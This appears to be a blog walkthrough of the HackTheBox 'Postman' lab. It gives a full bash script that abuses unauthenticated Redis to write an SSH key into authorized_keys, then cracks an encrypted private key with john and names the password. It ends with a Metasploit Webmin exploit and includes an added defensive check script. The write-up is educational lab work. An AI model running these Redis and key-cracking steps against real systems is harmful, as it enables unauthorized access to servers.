Saturday, March 14, 2020

Postman HackTheBox Walkthrough

Postman – HackTheBox Machine Walkthrough





The Postman machine from HTB is placed in the easy machines category, yet the method is difficult if you are not using Metasploit directly.



Nmap Scan

In the Nmap scan I found ports 22, 80, 6379/TCP (redis) and 10000/TCP open. You need to scan all ports, otherwise port 6379 will not be displayed.


Redis Enumeration & Exploit

After the Nmap scan finished, ports 6379 and 10000 looked interesting. After some work, I found that port 10000 serves the Webmin login page. Port 6379 is named redis, so I searched Google for Redis and found one interesting link -


You can put these commands in a script or run them directly.


Redis Script

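#!/bin/bash
# Replace any existing key pair in ~/.ssh with a fresh one
rm ~/.ssh/id*
ssh-keygen -t rsa
# Pad the public key with newlines so it sits on its own line in the dump file
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "n\n") > foo.txt
# Empty the database and store the padded key as a value
redis-cli -h 10.10.10.160 flushall
cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit
# Point the dump file at the redis user's authorized_keys and write it
redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh/
redis-cli -h 10.10.10.160 config set dbfilename "authorized_keys"
redis-cli -h 10.10.10.160 save
# Log in as the redis user with the new key
ssh -i ~/.ssh/id_rsa redis@10.10.10.160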

Source: https://github.com/Tatik07/Hackthebox/blob/master/Redis_exploit.sh

After running that script I get a shell as the redis user. In the home directory we can see the user name is Matt.
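A defender-side check for the technique above, as an added example that is not part of the original post: it flags an authorized_keys file that is really a Redis RDB dump and audits a redis.conf for the settings that leave CONFIG SET reachable by remote clients. The function names, file names and sample contents are constructed for illustration, and ACL-based setups (Redis 6+) are not covered.

```bash
#!/bin/bash
# Added example (not from the original post); all sample files are constructed.

# True if FILE starts with the RDB magic "REDIS", meaning a Redis SAVE wrote it.
# sshd skips lines it cannot parse, so the binary framing is the tell-tale.
is_rdb_dump() {
    [ -f "$1" ] && [ "$(head -c 5 "$1" | tr -d '\000')" = "REDIS" ]
}

# Last active (uncommented) value of directive $2 in redis.conf file $1.
conf_get() {
    awk -v d="$2" 'tolower($1) == d { $1 = ""; v = $0 }
                   END { sub(/^ +/, "", v); print v }' "$1"
}

# Print one finding per setting that leaves the CONFIG SET dir/dbfilename
# write path reachable by remote clients; exit status 1 if any were found.
audit_redis_conf() (
    conf=$1; n=0; set -f
    note() { echo "$conf: $1"; n=$((n + 1)); }
    bind=$(conf_get "$conf" bind)
    if [ -z "$bind" ]; then note "no bind directive, listens on all interfaces"; fi
    for a in $bind; do
        case "${a#-}" in 127.*|::1) ;; *) note "bind includes non-loopback address $a" ;; esac
    done
    case "$(conf_get "$conf" protected-mode)" in [Nn][Oo]) note "protected-mode is off" ;; esac
    if [ -z "$(conf_get "$conf" requirepass)" ]; then note "no requirepass set"; fi
    if ! grep -Eiq '^[[:space:]]*rename-command[[:space:]]+config[[:space:]]' "$conf"; then
        note "CONFIG command not renamed or disabled"
    fi
    [ "$n" -eq 0 ]
)

make_samples() {  # writes constructed sample files into directory $1
    printf 'bind 0.0.0.0\nprotected-mode no\n# requirepass foobared\n' > "$1/weak.conf"
    printf 'bind 127.0.0.1 -::1\nprotected-mode yes\nrequirepass constructed-secret\n' > "$1/hard.conf"
    printf 'rename-command CONFIG ""\n' >> "$1/hard.conf"
    printf 'REDIS0009\376\000\n\nssh-rsa AAAA-constructed demo@example\n\n\377' > "$1/rdb_keys"
    printf 'ssh-rsa AAAA-constructed admin@example\n' > "$1/clean_keys"
}

d=$(mktemp -d); make_samples "$d"
audit_redis_conf "$d/weak.conf" || true
for f in "$d/rdb_keys" "$d/clean_keys"; do
    if is_rdb_dump "$f"; then echo "$f: RDB dump, not a real authorized_keys"; fi
done
rm -rf "$d"
```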


Privilege Escalation

After running the LinEnum script and searching some directories, I found an SSH RSA key in the /opt directory.


-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
...
-----END RSA PRIVATE KEY-----

The key is encrypted, so we need to crack it: convert it with the ssh2john.py tool, then crack the result using john with rockyou.txt.

# python3 /usr/share/john/ssh2john.py key.txt > loll
# john --wordlist=<rockyou location> <filename>


The password is computer2008 & the user is Matt.


Webmin Exploit Using Metasploit

There are many exploits for Webmin. After using the packageup remote exploit, I got root access.
